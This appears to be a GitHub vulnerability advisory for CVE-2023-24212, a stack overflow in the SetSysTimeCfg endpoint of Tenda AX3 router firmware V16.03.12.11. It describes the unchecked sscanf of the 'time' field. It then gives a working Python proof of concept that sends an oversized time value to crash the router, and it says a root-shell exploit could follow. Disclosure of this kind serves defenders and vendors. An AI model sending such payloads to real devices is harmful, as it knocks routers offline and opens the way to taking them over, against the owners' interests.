Skip to content

Latest commit

 

History

History
39 lines (22 loc) · 1.08 KB

CVE-2023-24212.md

File metadata and controls

39 lines (22 loc) · 1.08 KB

Tenda AX3 V16.03.12.11 Stack overflow vulnerability

CVE-2023-24212

Firmware information

Affected version

Vulnerability details

In /goform/SetSysTimeCfg, First, the user will pass in the timeType. When the timeType is manual, the user can pass in time, and then use sscanf to assign the value of time to v14~v27. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

Poc

import requests

url = "http://192.168.0.1/goform/SetSysTimeCfg"

timeType = "manual"

time = "2023-01-15 "
time += "a" * 0x2000

r = requests.post(url, data={'timeType': timeType, 'time': time})
print(r.content)

Then you can see the router crash, and finally you can write exp to get rootshell